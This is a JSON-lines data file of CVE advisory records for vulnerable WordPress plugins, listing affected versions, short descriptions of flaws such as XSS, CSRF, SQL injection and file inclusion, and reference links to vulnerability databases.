{"CVE_ID":"CVE-2024-13647","slug":"sakolawp-lite","versionImpact":"1.0.8","description":"The School Management System \u2013 SakolaWP plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing or incorrect nonce validation on the 'save_exam_setting' and 'delete_exam_setting' actions. This makes it possible for unauthenticated attackers to update exam settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sakolawp-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5db3fc-6ae4-4566-8610-687cb725cf6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a5db3fc-6ae4-4566-8610-687cb725cf6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10631","slug":"countdown-timer-block","versionImpact":"1.0.5","description":"The Countdown Timer for WordPress Block Editor WordPress plugin through 1.0.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b153fb5e-7df2-491b-b61b-6f90314c7b04\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b153fb5e-7df2-491b-b61b-6f90314c7b04\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5233","slug":"color-palette","versionImpact":"4.3.2","description":"The Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hex\u2019 parameter in all versions up to, and including, 4.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/color-palette\\\/trunk\\\/source\\\/blocks\\\/color\\\/register.php#L62\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/color-palette\\\/trunk\\\/source\\\/blocks\\\/color\\\/register.php#L62\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/color-palette\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/color-palette\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd352c95-6e76-478f-943b-938a96b372f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd352c95-6e76-478f-943b-938a96b372f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7662","slug":"gestion-tarifs","versionImpact":"1.4","description":"The Gestion de tarifs plugin for WordPress is vulnerable to SQL Injection via the 'tarif' and 'intitule' shortcodes in all versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestion-tarifs\\\/trunk\\\/gestion-tarifs-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gestion-tarifs\\\/trunk\\\/gestion-tarifs-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gestion-tarifs\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gestion-tarifs\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d117d930-d210-44bf-ac49-19c003ca5a24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d117d930-d210-44bf-ac49-19c003ca5a24?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0085","slug":"metform","versionImpact":"3.2.1","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to reCaptcha Bypass in versions up to, and including, 3.2.1. This is due to insufficient server side checking on the captcha value submitted during a form submission. This makes it possible for unauthenticated attackers to bypass Captcha restrictions and for attackers to utilize bots to submit forms.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69527d4b-49b6-47cd-93b6-39350f881ec9\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69527d4b-49b6-47cd-93b6-39350f881ec9\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2868889%40metform&new=2868889%40metform&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2868889%40metform&new=2868889%40metform&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1861","slug":"limit-login-attempts","versionImpact":"1.7.2","description":"The Limit Login Attempts WordPress plugin through 1.7.2 does not sanitize and escape usernames when outputting them back in the logs dashboard, which could allow any authenticated users, such as subscriber to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/461cbcca-aed7-4c92-ba35-ebabf4fcd810\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/461cbcca-aed7-4c92-ba35-ebabf4fcd810\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36718","slug":"ninja-gdpr-compliance","versionImpact":"2.3","description":"The GDPR CCPA Compliance Support plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.3 via deserialization of untrusted input \"njt_gdpr_allow_permissions\" value. This allows unauthenticated attackers to inject a PHP Object.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/gdpr-ccpa-compliance-support-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/gdpr-ccpa-compliance-support-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f1d6fb-c665-419e-a13b-688b1df6c395\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/92f1d6fb-c665-419e-a13b-688b1df6c395\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2408938\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2408938\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-gdpr-compliance\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ninja-gdpr-compliance\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2871261-3231-4a52-9a38-bb3caf461e7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2871261-3231-4a52-9a38-bb3caf461e7d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2411356\\\/ninja-gdpr-compliance\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2411356\\\/ninja-gdpr-compliance\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0689","slug":"metform","versionImpact":"3.3.1","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Information Disclosure via the 'mf_first_name' shortcode in versions up to, and including, 3.3.1. This allows authenticated attackers, with subscriber-level capabilities or above to obtain sensitive information about arbitrary form submissions, including the submitter's first name.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2910040\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/356cf06e-16e7-438b-83b5-c8a52a21f903?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/356cf06e-16e7-438b-83b5-c8a52a21f903?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4626","slug":"ladipage","versionImpact":"4.3","description":"The LadiApp plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ladiflow_save_hook() function in versions up to, and including, 4.3. This makes it possible for authenticated attackers with subscriber-level access and above to update the 'ladiflow_hook_configs' option.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47dccf26-6c8d-4418-a874-c29749bee537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47dccf26-6c8d-4418-a874-c29749bee537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ladipage\\\/trunk\\\/ladipage.php#L1983\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4218","slug":"affieasy","versionImpact":"1.1.7","description":"The AffiEasy plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.7. This is due to plugin improperly releasing the tagged and patched version of the plugin - the vulnerable version is used as the core files, while the patched version was included in a 'trunk' folder. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095a2262-1da2-4f79-896c-6d48eb079a7b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/095a2262-1da2-4f79-896c-6d48eb079a7b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affieasy\\\/tags\\\/1.1.6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affieasy\\\/tags\\\/1.1.6\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3972","slug":"similarity","versionImpact":"3.0","description":"The Similarity WordPress plugin through 3.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55dfb9b5-d590-478b-bd1f-d420b79037fa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/55dfb9b5-d590-478b-bd1f-d420b79037fa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5456","slug":"pandavideo","versionImpact":"1.4.0","description":"The Panda Video plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.4.0 via the 'selected_button' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ab250a-387c-431e-9b75-16ede94bf0ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/94ab250a-387c-431e-9b75-16ede94bf0ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/widgets\\\/PandaButton.php#L237\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pandavideo\\\/trunk\\\/includes\\\/widgets\\\/PandaButton.php#L237\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49260","slug":"limb-gallery","versionImpact":"1.5.7","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Limb WordPress Gallery Plugin \u2013 Limb Image Gallery allows Code Injection.This issue affects WordPress Gallery Plugin \u2013 Limb Image Gallery: from n\/a through 1.5.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/limb-gallery\\\/wordpress-limb-gallery-plugin-1-5-7-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11354","slug":"ultimate-youtube-video-player","versionImpact":"3.3","description":"The Ultimate YouTube Video & Shorts Player With Vimeo plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the del_ytsingvid() function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete single playlists.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/admin.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/delsingvid.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-youtube-video-player\\\/trunk\\\/admin\\\/inc\\\/handler\\\/delsingvid.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c99510-fd57-4268-8e35-6f7e6f912b7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30c99510-fd57-4268-8e35-6f7e6f912b7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12816","slug":"notice-board-by-towkir","versionImpact":"3.1","description":"The NOTICE BOARD BY TOWKIR plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'notice-board' shortcode in all versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-board-by-towkir\\\/trunk\\\/towkir-notice-board.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/notice-board-by-towkir\\\/trunk\\\/towkir-notice-board.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notice-board-by-towkir\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/notice-board-by-towkir\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/069b2f3e-da9d-476c-a9fa-1b7d445a704b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/069b2f3e-da9d-476c-a9fa-1b7d445a704b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1517","slug":"sina-extension-for-elementor","versionImpact":"3.6.0","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Fancy Text, Countdown Widget, and Login Form shortcodes in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/shaonsina\\\/sina-extension-for-elementor\\\/commit\\\/5cb89db08b15a3011800ee0f6ad68c69c5a256d5\",\"name\":\"https:\\\/\\\/github.com\\\/shaonsina\\\/sina-extension-for-elementor\\\/commit\\\/5cb89db08b15a3011800ee0f6ad68c69c5a256d5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-countdown.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-login-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/advanced\\\/sina-login-form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-fancytext.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/widgets\\\/basic\\\/sina-fancytext.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246221\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3246221\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sina-extension-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sina-extension-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e699f521-9133-41b0-b667-528da78fec06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e699f521-9133-41b0-b667-528da78fec06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1487","slug":"wowpth","versionImpact":"2.0","description":"The WoWPth WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c683c2e-4f7f-4862-b844-6bdc3d1885dd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9c683c2e-4f7f-4862-b844-6bdc3d1885dd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5123","slug":"contact-us-page-contact-people","versionImpact":"3.7.4","description":"The Contact Us Page \u2013 Contact People plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 parameter in all versions up to, and including, 3.7.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-us-page-contact-people\\\/trunk\\\/classes\\\/class-people-contact.php#L743\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-us-page-contact-people\\\/trunk\\\/classes\\\/class-people-contact.php#L743\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-us-page-contact-people\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-us-page-contact-people\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcffc816-ff56-4875-b234-91dd1d073721?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcffc816-ff56-4875-b234-91dd1d073721?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7650","slug":"bizcalendar-web","versionImpact":"1.1.0.50","description":"The BizCalendar Web plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.0.50 via the 'bizcalv' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bizcalendar-web\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bizcalendar-web\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0640538c-b076-453c-a32e-f33b4e1c77ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0640538c-b076-453c-a32e-f33b4e1c77ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3811","slug":"eu-cookie-law","versionImpact":"3.1.6","description":"The EU Cookie Law for GDPR\/CCPA WordPress plugin through 3.1.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262924da-e269-4008-a24f-9f26a033b23e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/262924da-e269-4008-a24f-9f26a033b23e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0084","slug":"metform","versionImpact":"3.1.2","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via text areas on forms in versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, which is the submissions page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f7d9fe-e95f-4ddf-9bce-2aeac3c2e946\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05f7d9fe-e95f-4ddf-9bce-2aeac3c2e946\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2845078%40metform&new=2845078%40metform&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2845078%40metform&new=2845078%40metform&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/metform\\\/#description\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36717","slug":"kali-forms","versionImpact":"2.1.1","description":"The Kali Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.1. This is due to incorrect nonce handling throughout the plugin's function. This makes it possible for unauthenticated attackers to access the plugin's administrative functions via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5bcf456-f991-4775-8c3e-a3c0212a5765?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a5bcf456-f991-4775-8c3e-a3c0212a5765?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kali-forms-plugin-fixed-multiple-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4718","slug":"font-awesome-4-menus","versionImpact":"4.7.0","description":"The Font Awesome 4 Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'fa' and 'fa-stack' shortcodes in versions up to, and including, 4.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L214\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L197\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-4-menus\\\/trunk\\\/n9m-font-awesome-4.php?rev=1526295#L197\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc59510c-6eaf-4526-8acb-c07e39923ad9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc59510c-6eaf-4526-8acb-c07e39923ad9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
